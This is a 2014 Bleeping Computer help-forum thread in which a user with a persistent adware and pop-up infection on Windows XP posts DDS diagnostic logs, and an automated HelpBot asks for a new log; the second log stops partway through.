Virus Immune to ComboFix, Spybot, etc, etc...please help!!


15 replies to this topic

#1 rockgremlin

rockgremlin

  • Members
  • 8 posts

Posted 10 August 2014 - 09:46 PM

Ran the following programs to no avail:

 

Superantispyware

Spybot S&D

TDSKiller

Combofix

 

Nothing helps...whatever is infecting my computer just keeps getting stronger for every scan I complete. Every other click spawns three new pop-up ads or internet tabs that run advertisements for coupons or antispyware programs. TDSKiller indicated that it was a rootkit but was unsuccessful at removing it. Please help...thanks in advance!!

 

Here's my dds log:

 

DDS (Ver_2012-11-20.01) - NTFS_x86
Internet Explorer: 7.0.6000.17103  BrowserJavaVersion: 10.25.2
Run by Jay at 19:57:44 on 2014-08-10
Microsoft Windows XP Professional  5.1.2600.3.1252.1.1033.18.1014.549 [GMT -6:00]
.
AV: avast! Internet Security *Disabled/Outdated* {7591DB91-41F0-48A3-B128-1A293FD8233D}
FW: avast! Internet Security *Enabled*
.
============== Running Processes ================
.
C:\Program Files\AVAST Software\Avast\AvastSvc.exe
C:\Program Files\AVAST Software\Avast\afwServ.exe
C:\WINDOWS\system32\spoolsv.exe
C:\Program Files\SUPERAntiSpyware\SASCORE.EXE
C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
C:\Program Files\Bonjour\mDNSResponder.exe
C:\Program Files\Common Files\Intuit\Update Service v4\IntuitUpdateService.exe
C:\Program Files\Java\jre7\bin\jqs.exe
C:\Program Files\005\mtgaotushb32.exe
C:\Program Files\Microsoft\Search Enhancement Pack\SeaPort\SeaPort.exe
C:\Program Files\Settings Manager\smdmf\SmdmFService.exe
C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE
C:\Program Files\Settings Manager\smdmf\SmdmFService.exe
C:\Program Files\Settings Manager\smdmf\smdmfu.exe
C:\WINDOWS\System32\alg.exe
C:\WINDOWS\system32\wscntfy.exe
C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSvcM.exe
C:\WINDOWS\RTHDCPL.EXE
C:\Program Files\CyberLink\PowerDVD\PDVDServ.exe
C:\Acer\Empowering Technology\eRecovery\eRAgent.exe
C:\WINDOWS\system32\hkcmd.exe
C:\WINDOWS\system32\igfxpers.exe
C:\Acer\Empowering Technology\eDataSecurity\eDSloader.exe
C:\Program Files\AVAST Software\Avast\avastUI.exe
C:\Program Files\MSN Toolbar\Platform\4.0.0357.1\mswinext.exe
C:\Program Files\iTunes\iTunesHelper.exe
C:\Program Files\Common Files\Java\Java Update\jusched.exe
C:\Program Files\HP\HP Software Update\HPWuSchd2.exe
C:\Documents and Settings\Jay\Local Settings\Application Data\fst_us_199\upfst_us_199.exe
C:\Documents and Settings\Jay\Application Data\Spotify\Data\SpotifyWebHelper.exe
C:\Program Files\iPod\bin\iPodService.exe
C:\Program Files\Acer WLAN 11g USB Dongle\ZDWlan.exe
C:\Program Files\HP\Digital Imaging\bin\hpqtra08.exe
C:\Program Files\WinZip\WZQKPICK.EXE
C:\Program Files\HP\Digital Imaging\bin\hpqSTE08.exe
C:\Program Files\HP\Digital Imaging\bin\hpqbam08.exe
C:\Program Files\HP\Digital Imaging\bin\hpqgpc01.exe
C:\WINDOWS\explorer.exe
C:\WINDOWS\system32\rundll32.exe
C:\WINDOWS\system32\rundll32.exe
C:\WINDOWS\system32\wbem\wmiprvse.exe
C:\WINDOWS\system32\svchost.exe -k DcomLaunch
C:\WINDOWS\system32\svchost.exe -k rpcss
C:\WINDOWS\System32\svchost.exe -k netsvcs
C:\WINDOWS\system32\svchost.exe -k WudfServiceGroup
C:\WINDOWS\system32\svchost.exe -k NetworkService
C:\WINDOWS\system32\svchost.exe -k LocalService
C:\WINDOWS\system32\svchost.exe -k LocalService
C:\WINDOWS\system32\svchost.exe -k hpdevmgmt
C:\WINDOWS\system32\svchost.exe -k HPService
C:\WINDOWS\System32\svchost.exe -k HPZ12
C:\WINDOWS\System32\svchost.exe -k HPZ12
C:\WINDOWS\system32\svchost.exe -k imgsvc
C:\WINDOWS\system32\svchost.exe -k netsvcs
.
============== Pseudo HJT Report ===============
.
uStart Page = hxxp://groovorio.com/?f=1&a=grv_tuto1_14_30&cd=2XzuyEtN2Y1L1QzutDtDtCzytBtCyDyC0CzzyBtC0Ezy0AtAtN0D0Tzu0SzyyDtAtN1L2XzutBtFtBtCtFtCzztFtAtN1L1Czu1N1C2X1V2Z2Y2Z1FtC1VtCyE1VtAtDtN1L1G1B1V1N2Y1L1Qzu2StD0CtCzyyE0DzzzztG0FtCyBzztGzz0E0EzztGtCyD0AtDtGtCzytA0B0D0Ezz0Ezz0A0CtC2QtN1M1F1B2Z1V1N2Y1L1Qzu2SyE0CyCtA0A0AzyzytGtD0DyBtAtG0CyCyDtAtG0A0ByDzztGtCtByBzz0C0EyEyB0BtC0FtC2Q&cr=752508404&ir=
uSearchMigratedDefaultURL = hxxp://search.live.com/results.aspx?q={searchTerms}&src={referrer:source?}
mStart Page = hxxp://www.google.com
uProxyServer = hxxp=127.0.0.1
uSearchURL,(Default) = hxxp://us.rd.yahoo.com/customize/ycomp/defaults/su/*http://www.yahoo.com
BHO: HP Print Enhancer: {0347C33E-8762-4905-BF09-768834316C61} - c:\program files\hp\digital imaging\smart web printing\hpswp_printenhancer.dll
BHO: Spybot-S&D IE Protection: {53707962-6F74-2D53-2644-206D7942484F} - c:\program files\spybot - search & destroy\SDHelper.dll
BHO: Search Helper: {6EBF7485-159F-4bff-A14F-B9E3AAC4465B} - c:\program files\microsoft\search enhancement pack\search helper\SEPsearchhelperie.dll
BHO: Java™ Plug-In SSV Helper: {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - c:\program files\java\jre7\bin\ssv.dll
BHO: avast! WebRep: {8E5E2654-AD2D-48bf-AC2D-D17F00898D06} - c:\program files\avast software\avast\aswWebRepIE.dll
BHO: Windows Live ID Sign-in Helper: {9030D464-4C02-4ABF-8ECC-5164760863C6} - c:\program files\common files\microsoft shared\windows live\WindowsLiveLogin.dll
BHO: SaverPro: {B1C50D68-A112-A194-98C5-6E673EC9E3A8} - c:\documents and settings\all users\application data\saverpro\HeV0cV.dll
BHO: MSN Toolbar BHO: {d2ce3e00-f94a-4740-988e-03dc2f38c34f} - c:\program files\msn toolbar\platform\4.0.0357.1\npwinext.dll
BHO: Java™ Plug-In 2 SSV Helper: {DBC80044-A445-435b-BC74-9C25C1C588A9} - c:\program files\java\jre7\bin\jp2ssv.dll
BHO: HP Smart BHO Class: {FFFFFFFF-CF4E-4F2B-BDC2-0E72E116A856} - c:\program files\hp\digital imaging\smart web printing\hpswp_BHO.dll
TB: Acer eDataSecurity Management: {5CBE3B7C-1E47-477e-A7DD-396DB0476E29} - c:\windows\system32\eDStoolbar.dll
TB: MSN Toolbar: {8dcb7100-df86-4384-8842-8fa844297b3f} - c:\program files\msn toolbar\platform\4.0.0357.1\npwinext.dll
TB: avast! WebRep: {8E5E2654-AD2D-48bf-AC2D-D17F00898D06} - c:\program files\avast software\avast\aswWebRepIE.dll
EB: HP Smart Web Printing: {555D4D79-4BD2-4094-A395-CFC534424A05} - c:\program files\hp\digital imaging\smart web printing\hpswp_bho.dll
uRun: [SpybotSD TeaTimer] c:\program files\spybot - search & destroy\TeaTimer.exe
uRun: [SUPERAntiSpyware] c:\program files\superantispyware\SUPERAntiSpyware.exe
uRun: [Spotify Web Helper] "c:\documents and settings\jay\application data\spotify\data\SpotifyWebHelper.exe"
mRun: [LaunchApp] Alaunch
mRun: [RTHDCPL] RTHDCPL.EXE
mRun: [SkyTel] SkyTel.EXE
mRun: [ntiMUI] c:\program files\newtech infosystems\nti cd & dvd-maker 7\ntiMUI.exe
mRun: [RemoteControl] "c:\program files\cyberlink\powerdvd\PDVDServ.exe"
mRun: [IMJPMIG8.1] "c:\windows\ime\imjp8_1\IMJPMIG.EXE" /Spoil /RemAdvDef /Migration32
mRun: [IMEKRMIG6.1] c:\windows\ime\imkr6_1\IMEKRMIG.EXE
mRun: [MSPY2002] c:\windows\system32\ime\pintlgnt\ImScInst.exe /SYNC
mRun: [PHIME2002ASync] c:\windows\system32\ime\tintlgnt\TINTSETP.EXE /SYNC
mRun: [PHIME2002A] c:\windows\system32\ime\tintlgnt\TINTSETP.EXE /IMEName
mRun: [IgfxTray] c:\windows\system32\igfxtray.exe
mRun: [HotKeysCmds] c:\windows\system32\hkcmd.exe
mRun: [Persistence] c:\windows\system32\igfxpers.exe
mRun: [eDataSecurity Loader] c:\acer\empowering technology\edatasecurity\eDSloader.exe 0
mRun: [eRecoveryService] c:\acer\empowering technology\erecovery\eRAgent.exe
mRun: [QuickCare2.2] c:\program files\qwest\quickcare\bin\sprtcmd.exe /P QuickCare2.2
mRun: [AmazonGSDownloaderTray] c:\program files\amazon\amazon games & software downloader\AmazonGSDownloaderTray.exe
mRun: [avast] "c:\program files\avast software\avast\avastUI.exe" /nogui
mRun: [MSN Toolbar] "c:\program files\msn toolbar\platform\4.0.0357.1\mswinext.exe"
mRun: [Microsoft Default Manager] "c:\program files\microsoft\search enhancement pack\default manager\DefMgr.exe" -resume
mRun: [APSDaemon] "c:\program files\common files\apple\apple application support\APSDaemon.exe"
mRun: [iTunesHelper] "c:\program files\itunes\iTunesHelper.exe"
mRun: [QuickTime Task] "c:\program files\quicktime\QTTask.exe" -atboottime
mRun: [Adobe ARM] "c:\program files\common files\adobe\arm\1.0\AdobeARM.exe"
mRun: [SunJavaUpdateSched] "c:\program files\common files\java\java update\jusched.exe"
mRun: [HP Software Update] c:\program files\hp\hp software update\HPWuSchd2.exe
mRun: [upfst_us_199.exe] c:\documents and settings\jay\local settings\application data\fst_us_199\upfst_us_199.exe -runhelper
StartupFolder: c:\docume~1\jay\startm~1\programs\startup\mypcba~1.lnk - c:\qoobox\quarantine\c\program files\mypc backup\MyPC Backup.exe.vir
StartupFolder: c:\docume~1\alluse~1\startm~1\programs\startup\acerwl~1.lnk - c:\program files\acer wlan 11g usb dongle\ZDWlan.exe
StartupFolder: c:\docume~1\alluse~1\startm~1\programs\startup\adobeg~1.lnk - c:\program files\common files\adobe\calibration\Adobe Gamma Loader.exe
StartupFolder: c:\docume~1\alluse~1\startm~1\programs\startup\hpdigi~1.lnk - c:\program files\hp\digital imaging\bin\hpqtra08.exe
StartupFolder: c:\docume~1\alluse~1\startm~1\programs\startup\winzip~1.lnk - c:\program files\winzip\WZQKPICK.EXE
uPolicies-Explorer: NoDriveTypeAutoRun = dword:323
uPolicies-Explorer: NoDriveAutoRun = dword:67108863
uPolicies-Explorer: NoDrives = dword:0
mPolicies-Explorer: NoDriveAutoRun = dword:67108863
mPolicies-Explorer: NoDriveTypeAutoRun = dword:323
mPolicies-Explorer: NoDrives = dword:0
mPolicies-Windows\System: Allow-LogonScript-NetbiosDisabled = dword:1
mPolicies-Explorer: NoDriveTypeAutoRun = dword:323
mPolicies-Explorer: NoDriveAutoRun = dword:67108863
IE: {92780B25-18CC-41C8-B9BE-3C9C571A8263} - {FF059E31-CC5A-4E2E-BF3B-96E929D65503}
IE: {DDE87865-83C5-48c4-8357-2F5B1AA84522} - {DDE87865-83C5-48c4-8357-2F5B1AA84522} - c:\program files\hp\digital imaging\smart web printing\hpswp_BHO.dll
IE: {DFB852A3-47F8-48C4-A200-58CAB36FD2A2} - {53707962-6F74-2D53-2644-206D7942484F} - c:\program files\spybot - search & destroy\SDHelper.dll
IE: {e2e2dd38-d088-4134-82b7-f2ba38496583} - %windir%\Network Diagnostic\xpnetdiag.exe
IE: {FB5F1910-F110-11d2-BB9E-00C04F795683} - c:\program files\messenger\msmsgs.exe
DPF: {0E5F0222-96B9-11D3-8997-00104BD12D94} - hxxp://pcpitstop.com/pcpitstop/PCPitStop.CAB
DPF: {0EB0E74A-2A76-4AB3-A7FB-9BD8C29F7F75} - hxxp://www.kaspersky.com/kos/english/kavwebscan_unicode.cab
DPF: {166B1BCA-3F9C-11CF-8075-444553540000} - hxxp://download.macromedia.com/pub/shockwave/cabs/director/sw.cab
DPF: {4F1E5B1A-2A80-42CA-8532-2D05CB959537} - hxxp://gfx1.mail.live.com/mail/w1/resources/MSNPUpld.cab
DPF: {7530BFB8-7293-4D34-9923-61A11451AFC5} - hxxp://download.eset.com/special/eos/OnlineScanner.cab
DPF: {D27CDB6E-AE6D-11CF-96B8-444553540000} - hxxp://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab
TCP: NameServer = 69.144.127.53 68.116.46.115 71.9.127.107
TCP: Interfaces\{CFC10892-8484-42F4-A98A-DAFA48F3A805} : DHCPNameServer = 69.144.127.53 68.116.46.115 71.9.127.107
Notify: !SASWinLogon - c:\program files\superantispyware\SASWINLO.DLL
Notify: igfxcui - igfxdev.dll
AppInit_DLLs= c:\docume~1\alluse~1\applic~1\browse~1\browse~1.dll
SSODL: WPDShServiceObj - {AAA288BA-9A4C-45B0-95D7-94D524869DB5} - c:\windows\system32\WPDShServiceObj.dll
SEH: SABShellExecuteHook Class - {5AE067D3-9AFB-48E0-853A-EBB7F4A000DA} - c:\program files\superantispyware\SASSEH.DLL
mASetup: {8A69D345-D564-463c-AFF1-A69D9E530F96} - "c:\program files\google\chrome\application\36.0.1985.125\installer\chrmstp.exe" --configure-user-settings --verbose-logging --system-level --multi-install --chrome
.
================= FIREFOX ===================
.
FF - ProfilePath - c:\documents and settings\jay\application data\mozilla\firefox\profiles\vthtiiie.default\
FF - prefs.js: browser.search.selectedEngine - default-search.net
FF - prefs.js: browser.startup.homepage - hxxp://www.google.com/
FF - prefs.js: keyword.URL - hxxp://www.default-search.net/search?sid=516&aid=104&itype=n&ver=13539&tm=436&src=ds&p=
FF - plugin: c:\documents and settings\jay\local settings\application data\robloxversions\version-759151294bb84441\NPRobloxProxy.dll
FF - plugin: c:\program files\adobe\reader 11.0\reader\air\nppdf32.dll
FF - plugin: c:\program files\canon\zoombrowser ex\program\NPCIG.dll
FF - plugin: c:\program files\google\update\1.3.24.15\npGoogleUpdate3.dll
FF - plugin: c:\program files\java\jre7\bin\plugin2\npjp2.dll
FF - plugin: c:\program files\microsoft silverlight\5.1.20513.0\npctrlui.dll
FF - plugin: c:\program files\msn toolbar\platform\4.0.0357.1\npwinext.dll
FF - plugin: c:\windows\system32\adobe\director\np32dsw_1211151.dll
FF - plugin: c:\windows\system32\macromed\flash\NPSWF32_14_0_0_145.dll
FF - plugin: c:\windows\system32\npdeployJava1.dll
FF - plugin: c:\windows\system32\npptools.dll
FF - ExtSQL: !HIDDEN! 2009-09-02 18:55; {20a82645-c095-46ed-80e3-08825760534b}; c:\windows\microsoft.net\framework\v3.5\windows presentation foundation\DotNetAssistantExtension
FF - ExtSQL: !HIDDEN! 2011-09-19 21:23; smartwebprinting@hp.com; c:\program files\hp\digital imaging\smart web printing\MozillaAddOn3
.
============= SERVICES / DRIVERS ===============
.
R0 aswKbd;aswKbd;c:\windows\system32\drivers\aswKbd.sys [2012-3-30 21576]
R0 aswNdis;avast! Firewall NDIS Filter Service;c:\windows\system32\drivers\aswNdis.sys [2011-9-5 12112]
R0 aswNdis2;avast! Firewall Core Firewall Service;c:\windows\system32\drivers\aswNdis2.sys [2011-9-5 204784]
R0 aswRvrt;aswRvrt;c:\windows\system32\drivers\aswRvrt.sys [2013-3-21 49376]
R0 aswVmm;aswVmm;c:\windows\system32\drivers\aswVmm.sys [2013-3-21 175176]
R1 aswFW;avast! TDI Firewall driver;c:\windows\system32\drivers\aswFW.sys [2011-9-5 104752]
R1 aswSnx;aswSnx;c:\windows\system32\drivers\aswSnx.sys [2011-9-5 770344]
R1 aswSP;aswSP;c:\windows\system32\drivers\aswSP.sys [2011-9-5 369584]
R1 F06DEFF2-5B9C-490D-910F-35D3A9119622;F06DEFF2-5B9C-490D-910F-35D3A9119622;c:\program files\settings manager\smdmf\smdmfmgrc2.cfg [2014-8-10 34192]
R1 netfilter;netfilter;c:\windows\system32\drivers\netfilter.sys [2014-7-11 47488]
R1 SASDIFSV;SASDIFSV;c:\program files\superantispyware\sasdifsv.sys [2011-7-22 12880]
R1 SASKUTIL;SASKUTIL;c:\program files\superantispyware\SASKUTIL.SYS [2011-7-12 67664]
R2 !SASCORE;SAS Core Service;c:\program files\superantispyware\SASCore.exe [2011-8-11 116608]
R2 19275d4b;Browser System Enahncer;c:\windows\system32\rundll32.exe [2004-8-3 33280]
R2 aswFsBlk;aswFsBlk;c:\windows\system32\drivers\aswFsBlk.sys [2011-9-5 29816]
R2 aswMonFlt;aswMonFlt;c:\windows\system32\drivers\aswMonFlt.sys [2013-3-21 66336]
R2 avast! Antivirus;avast! Antivirus;c:\program files\avast software\avast\AvastSvc.exe [2011-9-5 46808]
R2 avast! Firewall;avast! Firewall;c:\program files\avast software\avast\afwServ.exe [2011-9-5 137960]
R2 IntuitUpdateServiceV4;Intuit Update Service v4;c:\program files\common files\intuit\update service v4\IntuitUpdateService.exe [2012-2-6 13672]
R2 mtgaotushb32;mtgaotushb32;c:\program files\005\mtgaotushb32.exe run options=01110010050000000000000000000000 sourceguid=0f467d68-149f-43b9-a30f-62da8d197fc3 --> c:\program files\005\mtgaotushb32.exe run options=01110010050000000000000000000000 sourceguid=0F467D68-149F-43B9-A30F-62DA8D197FC3 [?]
R2 SmdmFService;SmdmF Service;c:\program files\settings manager\smdmf\SmdmFService.exe [2014-8-10 3572240]
S1 ssnfd;ssnfd;c:\windows\system32\drivers\ssnfd.sys --> c:\windows\system32\drivers\ssnfd.sys [?]
S2 clr_optimization_v4.0.30319_32;Microsoft .NET Framework NGEN v4.0.30319_X86;c:\windows\microsoft.net\framework\v4.0.30319\mscorsvw.exe [2010-3-18 130384]
S2 sprtlisten;SupportSoft Listener Service;c:\program files\common files\supportsoft\bin\sprtlisten.exe /identity quickassist    --> c:\program files\common files\supportsoft\bin\sprtlisten.exe  [?]
S3 06624408;06624408; [x]
S3 WPFFontCache_v0400;Windows Presentation Foundation Font Cache 4.0.0.0;c:\windows\microsoft.net\framework\v4.0.30319\wpf\WPFFontCache_v0400.exe [2010-3-18 753504]
S4 Amazon Download Agent;Amazon Download Agent;c:\program files\amazon\amazon games & software downloader\amazongsdownloaderservice.exe --> c:\program files\amazon\amazon games & software downloader\AmazonGSDownloaderService.exe [?]
S4 Symantec Core LC;Symantec Core LC;"c:\program files\common files\symantec shared\ccpd-lc\symlcsvc.exe" --> c:\program files\common files\symantec shared\ccpd-lc\symlcsvc.exe [?]
.
=============== Created Last 30 ================
.
2014-08-11 01:57:20    --------    d-----w-    c:\documents and settings\all users\application data\ea5b54591d578367
2014-08-11 01:57:15    --------    d-----w-    c:\documents and settings\jay\AppData
2014-08-11 01:57:13    --------    d-----w-    c:\documents and settings\all users\application data\SaverPro
2014-08-11 01:46:44    --------    d-----w-    c:\documents and settings\all users\application data\Browser System Enahncer
2014-08-11 01:46:21    --------    d-----w-    c:\documents and settings\all users\application data\2308189059
2014-08-11 01:02:54    98816    ----a-w-    c:\windows\sed.exe
2014-08-11 01:02:54    256000    ----a-w-    c:\windows\PEV.exe
2014-08-11 01:02:54    208896    ----a-w-    c:\windows\MBR.exe
2014-08-11 01:02:14    --------    d-----w-    c:\program files\ToggleMark
2014-08-11 01:02:14    --------    d-----w-    c:\program files\Groovorio
2014-08-11 01:00:36    --------    d-----w-    c:\program files\0F467D68-149F-43B9-A30F-62DA8D197FC3
2014-08-11 00:59:53    --------    d-----w-    c:\documents and settings\jay\application data\VOPackage
2014-08-11 00:58:47    --------    d-----w-    c:\documents and settings\jay\local settings\application data\Linkey
2014-08-11 00:58:32    --------    d-----w-    c:\program files\Optimizer Pro
2014-08-11 00:58:16    --------    d-----w-    c:\documents and settings\jay\application data\FirefoxToolbar
2014-08-11 00:58:06    --------    d-----w-    c:\program files\Settings Manager
2014-08-11 00:57:51    --------    d-----w-    c:\documents and settings\jay\local settings\application data\fst_us_199
2014-08-11 00:57:50    --------    d-----w-    c:\program files\fst_us_199
2014-08-11 00:57:43    --------    d-----w-    c:\documents and settings\all users\application data\smdmf
2014-08-11 00:57:31    --------    d-----w-    c:\program files\005
2014-08-11 00:54:46    --------    d-----w-    c:\documents and settings\jay\local settings\application data\SearchProtect
2014-08-10 20:35:49    536576    ----a-w-    c:\windows\system32\sqlite3.dll
2014-08-10 20:32:56    --------    d-----w-    C:\AdwCleaner
2014-08-10 20:28:59    770384    ----a-w-    c:\program files\mozilla firefox\msvcr100.dll
2014-07-15 19:30:38    --------    d-----w-    c:\program files\F978377C-B7D4-4536-8E10-14CA97B13394
.
==================== Find3M  ====================
.
2014-07-11 14:13:52    47488    ----a-w-    c:\windows\system32\drivers\netfilter.sys
2014-07-09 14:01:59    71344    ----a-w-    c:\windows\system32\FlashPlayerCPLApp.cpl
2014-07-09 14:01:59    699056    ----a-w-    c:\windows\system32\FlashPlayerApp.exe
.
============= FINISH: 19:59:18.07 ===============
 

 


 


#2 HelpBot

HelpBot

    Bleepin' Binary Bot


  • Bots
  • 12,600 posts

Posted 15 August 2014 - 09:50 PM

Hello and welcome to Bleeping Computer!

I am HelpBot: an automated program designed to help the Bleeping Computer Staff better assist you! This message contains very important information, so please read through all of it before doing anything.

We apologize for the delay in responding to your request for help. Here at Bleeping Computer we get overwhelmed at times, and we are trying our best to keep up. Please note that your topic was not intentionally overlooked. Our mission is to help everyone in need, but sometimes it takes just a little longer to get to every request for help. No one is ignored here.

To help Bleeping Computer better assist you please perform the following steps:

***************************************************

Step 1: In order to continue receiving help at BleepingComputer.com, YOU MUST tell me if you still need help or if your issue has already been resolved on your own or through another resource! To tell me this, please click on the following link and follow the instructions there.

CLICK THIS LINK >>> http://www.bleepingcomputer.com/logreply/543995 <<< CLICK THIS LINK



If you no longer need help, then all you needed to do was the previous instructions of telling me so. You can skip the rest of this post. If you do need help please continue with Step 2 below.

***************************************************

Step 2: If you still need help, I would like you to post a Reply to this topic (click the "Add Reply" button in the lower right hand of this page). In that reply, please include the following information:

  • If you have not done so already, include a clear description of the problems you're having, along with any steps you may have performed so far.
  • A new DDS log. For your convenience, you will find the instructions for generating these logs repeated at the bottom of this post.
    • Please do this even if you have previously posted logs for us.
    • If you were unable to produce the logs originally please try once more.
    • If you are unable to create a log please provide detailed information about your installed Windows Operating System including the Version, Edition and if it is a 32bit or a 64bit system.
    • If you are unsure about any of these characteristics just post what you can and we will guide you.
  • Please tell us if you have your original Windows CD/DVD available.
  • Upon completing the above steps and posting a reply, another staff member will review your topic and do their best to resolve your issues.

Thank you for your patience, and again sorry for the delay.

***************************************************

We need to see some information about what is happening in your machine. Please perform the following scan again:

  • Download DDS by sUBs from the following link if you no longer have it available and save it to your desktop.

    DDS.com Download Link
  • Double click on the DDS icon, allow it to run.
  • A small box will open, with an explanation about the tool. No input is needed, the scan is running.
  • Notepad will open with the results.
  • Follow the instructions that pop up for posting the results.
  • Close the program window, and delete the program from your desktop.
Please note: You may have to disable any script protection running if the scan fails to run. After downloading the tool, disconnect from the internet and disable all antivirus protection. Run the scan, enable your A/V and reconnect to the internet.

Information on A/V control can be found HERE.

As I am just a silly little program running on the BleepingComputer.com servers, please do not send me private messages as I do not know how to read and reply to them! Thanks!

#3 rockgremlin

rockgremlin
  • Topic Starter

  • Members
  • 8 posts

Posted 16 August 2014 - 12:25 AM

1. OK, so I have run a plethora of Anti-spyware/Anti-malware programs to rectify a number of problems that I believe are attributed to a virus or series of viruses. While navigating through Firefox, every other mouseclick generates a series of pop-up ads that either advertise for shopping websites, or masquerade as a software program that removes spyware, claiming that my computer is infected, and needs to be cleaned using their program. The pop-ups appear either in a new browser window, or a new tab within the browser I am currently viewing --- or both. I will proceed to close them, only to have them re-appear seconds later when I try and surf through different websites. Every click generates at least one pop-up, and sometimes up to four at once. It's incredibly obnoxious, and my internet is rendered almost unusable at this point.

 

In an effort to rectify the situation, I have run the following programs to no avail:

 

- Spybot S&D

- SuperAntiSpyware

- TDSKiller

- ADWCleaner

- Malwarebytes

- Combofix

- Kaspersky online virus scanner

 

Some of these programs I ran multiple times after running their prospective updates......and NONE of these worked! If anything, it just served to make the infection angry, generating more pop-ups with greater frequency. When I downloaded DDS, it hijacked my browser claiming that my computer was hacked, and that I needed to download and install their software program to fix the problem. TDSKiller claimed that my computer was infected by a rootkit virus, but didn't do anything beyond just notifying me about it.

 

2. My new DDS log:

 

DDS (Ver_2012-11-20.01) - NTFS_x86
Internet Explorer: 7.0.6000.17103  BrowserJavaVersion: 10.25.2
Run by Jay at 22:52:41 on 2014-08-15
Microsoft Windows XP Professional  5.1.2600.3.1252.1.1033.18.1014.229 [GMT -6:00]
.
AV: avast! Internet Security *Disabled/Outdated* {7591DB91-41F0-48A3-B128-1A293FD8233D}
FW: avast! Internet Security *Enabled*
.
============== Running Processes ================
.
C:\Program Files\AVAST Software\Avast\AvastSvc.exe
C:\Program Files\AVAST Software\Avast\afwServ.exe
C:\WINDOWS\system32\spoolsv.exe
C:\Program Files\SUPERAntiSpyware\SASCORE.EXE
C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
C:\Program Files\Bonjour\mDNSResponder.exe
C:\WINDOWS\Explorer.EXE
C:\Program Files\Common Files\Intuit\Update Service v4\IntuitUpdateService.exe
C:\Program Files\Java\jre7\bin\jqs.exe
C:\WINDOWS\RTHDCPL.EXE
C:\Program Files\CyberLink\PowerDVD\PDVDServ.exe
C:\Acer\Empowering Technology\eRecovery\eRAgent.exe
C:\WINDOWS\system32\hkcmd.exe
C:\WINDOWS\system32\igfxpers.exe
C:\Acer\Empowering Technology\eDataSecurity\eDSloader.exe
C:\Program Files\AVAST Software\Avast\avastUI.exe
C:\Program Files\MSN Toolbar\Platform\4.0.0357.1\mswinext.exe
C:\Program Files\iTunes\iTunesHelper.exe
C:\Program Files\Common Files\Java\Java Update\jusched.exe
C:\Program Files\Microsoft\Search Enhancement Pack\SeaPort\SeaPort.exe
C:\Program Files\HP\HP Software Update\HPWuSchd2.exe
C:\Documents and Settings\Jay\Local Settings\Application Data\fst_us_199\upfst_us_199.exe
C:\Program Files\Settings Manager\smdmf\SmdmFService.exe
C:\Program Files\Spybot - Search & Destroy\TeaTimer.exe
C:\Documents and Settings\Jay\Application Data\Spotify\Data\SpotifyWebHelper.exe
C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE
C:\Program Files\Settings Manager\smdmf\SmdmFService.exe
C:\Program Files\Acer WLAN 11g USB Dongle\ZDWlan.exe
C:\Program Files\Settings Manager\smdmf\smdmfu.exe
C:\Program Files\HP\Digital Imaging\bin\hpqtra08.exe
C:\Program Files\WinZip\WZQKPICK.EXE
C:\Program Files\iPod\bin\iPodService.exe
C:\WINDOWS\system32\wscntfy.exe
C:\WINDOWS\System32\alg.exe
C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSvcM.exe
C:\WINDOWS\system32\wbem\wmiapsrv.exe
C:\Program Files\HP\Digital Imaging\bin\hpqSTE08.exe
C:\Program Files\HP\Digital Imaging\bin\hpqbam08.exe
C:\Program Files\HP\Digital Imaging\bin\hpqgpc01.exe
C:\Program Files\Mozilla Firefox\firefox.exe
C:\Program Files\Mozilla Firefox\plugin-container.exe
C:\WINDOWS\system32\wbem\wmiprvse.exe
C:\WINDOWS\system32\svchost.exe -k DcomLaunch
C:\WINDOWS\system32\svchost.exe -k rpcss
C:\WINDOWS\System32\svchost.exe -k netsvcs
C:\WINDOWS\system32\svchost.exe -k WudfServiceGroup
C:\WINDOWS\system32\svchost.exe -k NetworkService
C:\WINDOWS\system32\svchost.exe -k LocalService
C:\WINDOWS\system32\svchost.exe -k LocalService
C:\WINDOWS\system32\svchost.exe -k netsvcs
C:\WINDOWS\system32\svchost.exe -k hpdevmgmt
C:\WINDOWS\system32\svchost.exe -k HPService
C:\WINDOWS\system32\svchost.exe -k imgsvc
C:\WINDOWS\System32\svchost.exe -k HPZ12
C:\WINDOWS\System32\svchost.exe -k HPZ12
.
============== Pseudo HJT Report ===============
.
uStart Page = hxxp://groovorio.com/?f=1&a=grv_tuto1_14_30&cd=2XzuyEtN2Y1L1QzutDtDtCzytBtCyDyC0CzzyBtC0Ezy0AtAtN0D0Tzu0SzyyDtAtN1L2XzutBtFtBtCtFtCzztFtAtN1L1Czu1N1C2X1V2Z2Y2Z1FtC1VtCyE1VtAtDtN1L1G1B1V1N2Y1L1Qzu2StD0CtCzyyE0DzzzztG0FtCyBzztGzz0E0EzztGtCyD0AtDtGtCzytA0B0D0Ezz0Ezz0A0CtC2QtN1M1F1B2Z1V1N2Y1L1Qzu2SyE0CyCtA0A0AzyzytGtD0DyBtAtG0CyCyDtAtG0A0ByDzztGtCtByBzz0C0EyEyB0BtC0FtC2Q&cr=752508404&ir=
uSearchMigratedDefaultURL = hxxp://search.live.com/results.aspx?q={searchTerms}&src={referrer:source?}
mStart Page = hxxp://www.google.com
uProxyServer = hxxp=127.0.0.1
uSearchURL,(Default) = hxxp://us.rd.yahoo.com/customize/ycomp/defaults/su/*http://www.yahoo.com
BHO: HP Print Enhancer: {0347C33E-8762-4905-BF09-768834316C61} - c:\program files\hp\digital imaging\smart web printing\hpswp_printenhancer.dll
BHO: Spybot-S&D IE Protection: {53707962-6F74-2D53-2644-206D7942484F} - c:\program files\spybot - search & destroy\SDHelper.dll
BHO: Search Helper: {6EBF7485-159F-4bff-A14F-B9E3AAC4465B} - c:\program files\microsoft\search enhancement pack\search helper\SEPsearchhelperie.dll
BHO: Java™ Plug-In SSV Helper: {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - c:\program files\java\jre7\bin\ssv.dll
BHO: avast! WebRep: {8E5E2654-AD2D-48bf-AC2D-D17F00898D06} - c:\program files\avast software\avast\aswWebRepIE.dll
